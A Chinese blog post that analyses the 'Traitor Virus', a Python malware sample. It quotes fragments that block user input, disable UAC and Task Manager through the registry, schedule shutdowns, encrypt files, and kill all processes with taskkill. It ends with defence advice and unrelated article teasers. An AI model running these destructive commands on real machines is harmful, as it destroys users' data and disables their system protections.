【东雪莲病毒|罕见病毒|Traitor Virus】

恶意程序分析:东雪莲病毒(Traitor Virus)

项目地址:东雪莲病毒|罕见病毒|Traitor Virus(Github)

代码效果展示

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述


一、代码概述

这是一款使用Python编写的恶意程序。在获取管理员权限后,会对计算机系统执行一系列破坏性操作,包括但不限于:

  • 封锁用户输入
  • 修改系统设置
  • 自动下载程序
  • 文件加密
  • 禁用任务管理器
  • 篡改系统图标
  • 播放音视频文件
  • 最终尝试杀死所有进程导致系统蓝屏崩溃

二、功能详细分析

1. 权限检测

def is_admin():try:return ctypes.windll.shell32.IsUserAnAdmin()except:return Falseif is_admin():# 恶意操作代码
else:if sys.version_info[0] == 3:ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, __file__, None, 1)
  • 运作机制:通过系统API检测管理员权限,未获取权限时尝试请求提权

2. 信息提示与输入封锁

tkinter.messagebox.showinfo('骂谁罕见呢?', '现在退出还来得及')
user32 = windll.LoadLibrary("C:\\Windows\\System32\\user32.dll")
user32.BlockInput(True)
  • 双重攻击:弹出迷惑性提示框后,立即锁定键盘鼠标输入

3. 系统设置篡改

▶ 禁用UAC功能
def close_uac():# 通过注册表修改以下键值:# ConsentPromptBehaviorAdmin=0# EnableLUA=0# PromptOnSecureDesktop=0
  • 后果:关闭用户账户控制(UAC),为后续破坏扫清障碍
▶ 设置开机自启关机
def shuTdoWn():# 在启动目录创建shutdown.batbat_content = "shutdown -s -t 60"
  • 效果:系统启动60秒后自动关机
▶ 自动下载原神
def GenShin_DownLoad():# 创建自动下载批处理脚本set downurl=https://ys-api.mihoyo.com/.../pc_default
  • 资源消耗:利用系统启动项静默下载大体积游戏文件

4. 进程终结与系统破坏

def close_explorer():run('taskkill /F /IM explorer.exe')
  • 立即影响:导致桌面/任务栏消失,系统界面崩溃

5. 弹窗与音频攻击

for i in range(15):t0 = threading.Thread(target=boom3)  # 播放随机音频t1 = threading.Thread(target=boom2)  # 创建弹窗
  • 拒绝服务攻击:通过多线程制造大量弹窗和音频播放,耗尽系统资源

6. 文件加密系统

def encrypt_file(file_path):# 使用3DES加密算法# 修改文件扩展名为.hanjian
  • 数据绑架:递归加密当前目录所有文件,密钥未妥善保存导致永久性数据丢失

7. 系统功能破坏

def disable_task_manager():# 注册表路径:HKEY_CURRENT_USER\...\System# 设置DisableTaskMgr=1
  • 反制措施:禁用任务管理器阻止用户终止恶意进程

8. EXE图标篡改

def set_exe_icon():# 修改注册表HKEY_CLASSES_ROOT\exefile\DefaultIcon
  • 视觉欺骗:将所有可执行文件图标替换为特定图案

9. 终极系统摧毁

if is_admin():os.system("Taskkill /fi \"pid ge 1\" /f")
  • 致命操作:强制结束所有进程导致系统蓝屏崩溃

三、⚠️安全警告⚠️

  1. 谨慎运行程序
    切勿随意执行来源不明的可执行文件,尤其警惕".bat"后缀脚本

  2. 权限最小化原则
    日常使用避免使用管理员账户,对权限请求保持警惕

  3. 系统防护措施

    • 保持Windows Defender实时保护开启
    • 定期进行全盘扫描
    • 及时安装系统安全更新
  4. 数据备份策略
    采用3-2-1备份原则:至少3份副本,2种介质,1份异地存储

  5. UAC保护机制
    保持用户账户控制设置为默认级别,不要禁用安全提示


四、防御建议

  • 企业环境部署EDR解决方案
  • 个人用户安装火绒/卡巴斯基等安全软件
  • 定期检查系统启动项(msconfig)
  • 监控注册表关键路径变更
  • 对重要文件实施加密备份

技术分析:网络小白_Uncle城 | 发布日期:2025-01-28
(注:本文仅作技术研究,严禁用于非法用途)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/9107.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

《Java核心技术 卷II》日期和时间API的时间线

日期和时间API Java1.0的Date类过于简单,大部分被弃用。 Java1.1引入Calendar类,但没有处理诸如闰秒之类的问题。 Java 8引入java.time.API,修正过去缺陷。 时间线 1967年,铯133原子的特性推导出了秒的精确定义。之后由原子钟网络…

IO进程寒假作业DAY6

请使用互斥锁 和 信号量分别实现5个线程之间的同步 使用互斥锁 #include <stdio.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include &…

mybatis(112/134)

多对一 第一种方法&#xff1a; 一的表参数设置&#xff1a; <association property"clazz" javaType"Clazz"> <id property"cid" column"cid"/> <result property"cname" column"cname"/> <…

读书笔记:《华为突围ERP封锁全纪实》

文章背景&#xff1a; 2019年5月&#xff0c;华为被美国制裁&#xff0c;其ERP系统面临断供风险。ERP系统是企业核心管理软件&#xff0c;一旦中断&#xff0c;华为的全球业务将陷入瘫痪。面对这一生死存亡的危机&#xff0c;华为启动了“突围”计划&#xff0c;历经数年艰苦奋…

【C++】设计模式详解:单例模式

文章目录 Ⅰ. 设计一个类&#xff0c;不允许被拷贝Ⅱ. 请设计一个类&#xff0c;只能在堆上创建对象Ⅲ. 请设计一个类&#xff0c;只能在栈上创建对象Ⅳ. 请设计一个类&#xff0c;不能被继承Ⅴ. 请设计一个类&#xff0c;只能创建一个对象&#xff08;单例模式&#xff09;&am…

K8s运维管理平台 - KubeSphere 3.x 和4.x 使用分析:功能较强,UI美观

目录标题 Lic使用感受优点&#xff1a;优化点&#xff1a; 实操首页项目 | 应用负载 | 配置 | 定制资源定义存储监控告警集群设置 **KubeSphere 3.x** 和 **4.x**1. **架构变化**&#xff1a;2. **多集群管理**&#xff1a;3. **增强的 DevOps 功能**&#xff1a;4. **监控与日…

SpringBoot或SpringAI对接DeekSeek大模型

今日除夕夜&#xff0c;deepseek可是出尽了风头&#xff0c;但是我看网上还没有这方面的内容对接&#xff0c;官网也并没有&#xff0c;故而本次对接是为了完成这个空缺 我看很多的博客内容是流式请求虽然返回时正常的&#xff0c;但是他并不是实时返回&#xff0c;而是全部响应…

低代码系统-产品架构案例介绍、明道云(十一)

明道云HAP-超级应用平台(Hyper Application Platform)&#xff0c;其实就是企业级应用平台&#xff0c;跟微搭类似。 通过自设计底层架构&#xff0c;兼容各种平台&#xff0c;使用低代码做到应用搭建、应用运维。 企业级应用平台最大的特点就是隐藏在冰山下的功能很深&#xf…

文献阅读 250128-Tropical forests are approaching critical temperature thresholds

Tropical forests are approaching critical temperature thresholds 来自 <Tropical forests are approaching critical temperature thresholds | Nature> 热带森林正在接近临界温度阈值 ## Abstract: The critical temperature beyond which photosynthetic machinery…

判断子序列

hello 大家好&#xff01;今天开写一个新章节&#xff0c;每一天一道算法题。让我们一起来学习算法思维吧&#xff01; function isSubsequence(s, t) {// 初始化两个指针&#xff0c;分别指向字符串 s 和 t 的起始位置let i 0; let j 0; // 当两个指针都未超出对应字符串的长…

您与此网站之间建立的连接不安全

网站建立好后&#xff0c;用360浏览器打开后地址栏有一个灰色小锁打着红色叉点击后显示“您与此网站之间建立的连接不安全”“请勿在此网站上输入任何敏感信息&#xff08;例如密码或信用卡信息&#xff09;&#xff0c;因为攻击者可能会盗取这些信息。” 出现这个提示的主要原…

解读隐私保护工具 Fluidkey:如何畅游链上世界而不暴露地址?

作者&#xff1a;Techub 独家解读 撰文&#xff1a;Tia&#xff0c;Techub News 隐私不只是个人权利的象征&#xff0c;更是我们迈向透明、信任未来的重要过渡桥梁。如果你还未意识到隐私的重要性&#xff0c;推荐阅读 KeyMapDAO 的文章《「被出卖的自由」&#xff1a;我到底该…

uniapp 地图添加,删除,编辑标记,在地图中根据屏幕范围中呈现标记

前言 小程序实现新功能&#xff0c;在地图中选取位置添加标记&#xff0c;并在地图中呈现添加的标记&#xff0c;&#xff08;呈现的是根据当前屏幕范围内的标记&#xff09;&#xff0c;并对标记进行分享&#xff0c;删除&#xff0c;编辑&#xff0c;导航&#xff0c;并从分…

DPO、KTO、DiffusionDPO

DPO&#xff08;Direct Preference Optimization&#xff09; 原文来自于 https://arxiv.org/pdf/2305.18290&#xff0c; Bradley-Terry (BT)模型&#xff0c;假设人的喜欢遵循下面的公式&#xff0c;给定x&#xff0c;得到 y 1 y_1 y1​和 y 2 y_2 y2​分别遵循以下关系&am…

Android Studio安装配置

一、注意事项 想做安卓app和开发板通信&#xff0c;踩了大坑&#xff0c;Android 开发不是下载了就能直接开发的&#xff0c;对于新手需要注意的如下&#xff1a; 1、Android Studio版本&#xff0c;根据自己的Android Studio版本对应决定了你所兼容的AGP&#xff08;Android…

GPU上没程序在跑但是显存被占用

原因&#xff1a;存在僵尸线程&#xff0c;运行完但是没有释放内存 查看僵尸线程 fuser -v /dev/nvidia*关闭僵尸线程 pkill -9 -u 用户名 程序名 举例&#xff1a;pkill -9 -u grs python参考&#xff1a;https://blog.csdn.net/qq_40206371/article/details/143798866

JAVA实战开源项目:蜗牛兼职平台(Vue+SpringBoot) 附源码

本文项目编号 T 034 &#xff0c;文末自助获取源码 \color{red}{T034&#xff0c;文末自助获取源码} T034&#xff0c;文末自助获取源码 目录 一、系统介绍1.1 平台架构1.2 管理后台1.3 用户网页端1.4 技术特点 二、演示录屏三、启动教程四、功能截图五、文案资料5.1 选题背景…

DeepSeek LLM解读

背景&#xff1a; 量化巨头幻方探索AGI&#xff08;通用人工智能&#xff09;新组织“深度求索”在成立半年后&#xff0c;发布的第一代大模型DeepSeek试用地址&#xff1a;DeepSeek &#xff0c;免费商用&#xff0c;完全开源。作为一家隐形的AI巨头&#xff0c;幻方拥有1万枚…

用WinForm如何制作简易计算器

首先我们要自己搭好页面 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms;namespace _7_简易计算…

Luzmo 专为SaaS公司设计的嵌入式数据分析平台

Luzmo 是一款嵌入式数据分析平台&#xff0c;专为 SaaS 公司设计&#xff0c;旨在通过直观的可视化和快速开发流程简化数据驱动决策。以下是关于 Luzmo 的详细介绍&#xff1a; 1. 背景与定位 Luzmo 前身为 Cumul.io &#xff0c;专注于为 SaaS 公司提供嵌入式分析解决方案。…